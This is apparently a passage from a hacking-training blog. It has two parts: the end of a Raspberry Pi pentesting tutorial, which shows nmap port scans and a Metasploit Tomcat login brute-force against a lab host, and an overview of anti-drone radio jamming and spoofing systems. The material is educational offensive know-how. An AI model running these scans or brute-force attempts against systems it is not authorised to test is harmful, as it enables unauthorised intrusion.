At this point, we have identified our target and can move on to the next step — network mapping with Nmap to see which ports are open. Nmap is one of the best-known tools in the cybersecurity field, and Hackers-Arise offers a dedicated training course for mastering Nmap; you can find it after the link.

I assume you already have a basic understanding of Nmap, so we can proceed to network enumeration.

Let’s run a simple Nmap scan to check for open ports:

kali> sudo nmap -p- --open –min-rate 5000 -n -Pn 192.168.0.150 -oG open_ports

This command checks all 65,535 TCP ports and only shows the ones that are open. It uses a high scan rate for speed (5000 packets per second) and skips DNS resolution, assuming the host is up, without pinging it. Also, the results are saved in a grepable format to a file called open_ports, so we can analyze them later.

At its peak, CPU usage was around 33% and around 2% of memory usage.

As a result, we found twelve open ports and can now move on to gathering a bit more information.

kali> sudo nmap -sC -sV -p135,139,445,5040,8080,49664,49665,49666,49667,49668,49668,49669,49670

This executes Nmap’s default script set (-sC) to identify commonly known vulnerabilities in services listening on the scanned ports. Additionally, -sV was used for service version detection.

This scan revealed some important information for further exploitation. The Raspberry Pi handled it quite well. I saw a brief spike in resource usage at the start, but it remained very low afterward.

Step #3: Exploitation

Let’s assume our reconnaissance is complete and we’ve discovered that the Tomcat application may be using weak credentials. We can now launch Metasploit and attempt a brute-force login.

msf6> use scanner/http/tomcat_mgr_login
msf6> set RHOSTS 192.168.0.150
msf6> run

The Raspberry Pi struggles somewhat to start Metasploit, although running it typically causes no issues.

Summary

The Raspberry Pi is a very powerful tool for every hacker. Our tools are generally lightweight, and the resources of this small board are enough to handle most tasks. So, if your budget is limited, buy a Raspberry Pi, connect it to your TV, and start learning cybersecurity.

If you want to grow in the pentesting field, check out our CWA Preparation Course — get certified, get hired, and start your journey!

SDR (Signals Intelligence) for Hackers: Getting Started with Anti-Drone Warfare

14 November 2025 at 10:33

Welcome back, aspiring cyberwarriors!

In modern warfare, we’re dealing with a whole new battlefield—one that’s invisible to the naked eye but just as deadly as kinetic warfare. Drones, or unmanned aerial vehicles (UAVs), have completely changed the game. From small commercial quadra-copters rigged with grenades to sophisticated military platforms conducting precision strikes, these aerial threats are everywhere on today’s battlefield.

But here’s the thing: they all depend on the electromagnetic spectrum to communicate, navigate, and operate. And that’s where Electronic Warfare (EW) comes in. Specifically, we’re talking about Electronic Countermeasures (ECM) designed to jam, disrupt, or even hijack these flying threats.

In this article, we’ll dive into how this invisible war is being fought. Let’s get rolling!

Understanding Radio-Electronic Warfare

Jamming UAVs falls under what’s called Radio-Electronic Warfare. The mission is simple in concept but complex in execution: disorganize the enemy’s command and control, wreck their reconnaissance efforts, and keep our own systems running smoothly.

Within this framework, we have COMJAM (suppression of radio communication channels). This is the bread and butter of counter-drone operations—disrupting the channels that control equipment and weapons, including those UAVs.

How Jamming Actually Works

Let’s get real about how this stuff actually works. It’s really just exploiting basic radio physics and the limitations of receiver systems.

Basic Jamming Principle

The Signal-to-Noise Game

All radio communication depends on what we call the signal-to-noise ratio (SNR). For a drone to receive its control commands or GPS signals, the legitimate signal must be stronger than the background electromagnetic noise.

This follows what’s known as the “jamming equation.” Here’s what matters:

Power output. A 30-watt personal jammer might protect just you and a small group of people, while a 200-watt system can throw up an electronic dome over a much bigger area. More watts equals more range and effectiveness.

Distance relationships. Think about it—the drone operator’s control signal has to travel several kilometers to reach the drone. But if we position our jammer between them or near the drone, we’ve got a much shorter transmission path.

Antenna gain. Directional antennas focus our jamming energy like a spotlight instead of a light bulb.

Frequency selectivity means we can target specific frequency bands used by drones while leaving other communications alone.

Types of Jamming Signals

Types of Jamming Techniques


Different situations call for different jamming techniques:

Noise jamming. We just sent random radio frequency energy across the target frequencies, creating a “wall” of interference.

Tone jamming transmits continuous wave signals at specific frequencies. It’s more power-efficient for targeting narrow-band communications, but modern systems can filter this out more easily.

Pulse jamming uses intermittent bursts of energy. This can be devastating against receivers that use time-based processing, and it conserves our jammer’s power for longer operations.

Swept jamming rapidly changes frequencies across a band. If the enemy drone is frequency-hopping to avoid us, swept jamming ensures we’re hitting them somewhere, though with less power at any single frequency at any moment.

Barrage jamming simultaneously broadcasts across wide frequency ranges. It’s comprehensive coverage, but it requires serious power output.

Smart Jamming and Spoofing

The most basic jamming just drowns out signals with noise. But the most advanced systems go way beyond that, using what we call “smart jamming” or spoofing.

Smart jamming means analyzing the source signal in real-time, understanding how it works, and then replacing it with a more powerful, false signal that the target system will actually accept as legitimate.

In the context of UAV operations, this gets really sophisticated. Systems can manipulate GPS signals to provide false positioning data, making drones think they’re somewhere they’re not—that’s spoofing. Even more advanced are systems like the Shipovnik-АЕРО complex, which can actually penetrate the UAV’s onboard systems and potentially take control.

Shipovnik-АЕРО Complex

What Actually Happens When We Jam a Drone

When we successfully jam a drone, what happens depends on what we’re targeting and how the drone is programmed to respond:

Control link jamming cuts the command channel between the operator and the drone. Depending on its fail-safe programming, the drone might hover in place, automatically return to its launch point, attempt to land immediately, or continue its last programmed mission autonomously.

GPS/GNSS jamming denies the drone accurate position information. Without GPS, most commercial drones and many military ones can’t maintain stable flight or navigate to targets. Some will fall back on inertial navigation systems, but those accumulate errors over time. Others become completely disoriented and crash.

Video link jamming blinds FPV operators, forcing them to fly without visual reference. This is particularly effective against FPV kamikaze drones, which require continuous video feedback for precision targeting.

Combined jamming hits multiple systems simultaneously—control, navigation, and video—creating a comprehensive denial effect that overwhelms even drones with redundant systems.

The Arsenal of Counter-Drone Electronic Warfare Systems

The modern battlefield has an array of EW systems designed specifically for detecting and suppressing drones. These range from massive, brigade-level complexes that can throw up electronic domes over vast areas to small, portable units that individual soldiers can carry for personal protection.

Dedicated Counter-UAS (C-UAS) Systems

The AUDS (Anti-UAV Defence System) is an example of dedicated C-UAS tech. It suppresses communication channels between UAVs and their operators with suppression distances of 2-4 kilometers for small UAVs and up to 8 kilometers for medium-sized platforms. The variation in range reflects the different power levels and signal characteristics of various drone types.

AUDS

The M-LIDS (Mobile-Low, Slow, Small Unmanned Aircraft System Integrated Defeat System) takes a more comprehensive approach. This system doesn’t just jam—it combines an EW suite with a 30mm counter-drone cannon for kinetic kills and even deploys Coyote kamikaze UAVs. It’s literally using drones to fight drones.

M-LIDS

Russian Federation EW Complexes

Russian forces have invested heavily in electronic warfare, including numerous systems specifically designed for drone suppression.

The Leer-2 system offers suppression of UAV communication channels at 4 kilometers for small UAVs and up to 8 kilometers for medium platforms. The Silok system is basically a mobile variant mounted on a Kamaz chassis, with a suppression distance of 3-4 kilometers, giving tactical units mobile EW capabilities.

Leer-2

The Repellent-1 system specifically targets UAV communication channels and satellite navigation, operating in the 200-600 MHz frequency range with a suppression distance of up to 30 kilometers.

Repellent-1

Personal and Tactical-Level Counter-Drone Protection

Big systems are great for area defense, but the ubiquity of small drones has created massive demand for personal and small-unit protection. These portable devices focus on the most commonly used frequencies for commercial and modified commercial drones, providing immediate, localized protection.

The UNWAVE SHATRO represents cutting-edge personal counter-drone protection. Available in portable, wearable, and mobile versions, this system creates a protective bubble with a radius of 50-100 meters, specifically targeting guided munitions and UAVs operating in the 850-930 MHz range.

UNWAVE SHATRO

The UNWAVE BOOMBOX offers both directed protection (up to 500 meters) and omnidirectional coverage (100 meters), targeting multiple frequency bands critical to drone operations. By suppressing frequencies including 850-930 MHz, 1550-1620 MHz (GPS), 2400-2480 MHz (Wi-Fi/Control), and 5725-5850 MHz (Wi-Fi/Video), this system addresses the full spectrum of commercial drone communication and navigation systems.

UNWAVE BOOMBOX

Summary

This article examines the role of Electronic Warfare (EW) in combating unmanned aerial vehicles (UAVs), which rely on electromagnetic signals for operation. It discusses jamming techniques like noise, tone, and pulse jamming, along with advanced methods such as smart jamming and spoofing.

The invisible war for control of the electromagnetic spectrum may not capture headlines like kinetic combat, but make no mistake—it’s every bit as crucial to the outcome of modern conflicts.

Look for our Anti-Drone Warfare training in 2026!

❌
❌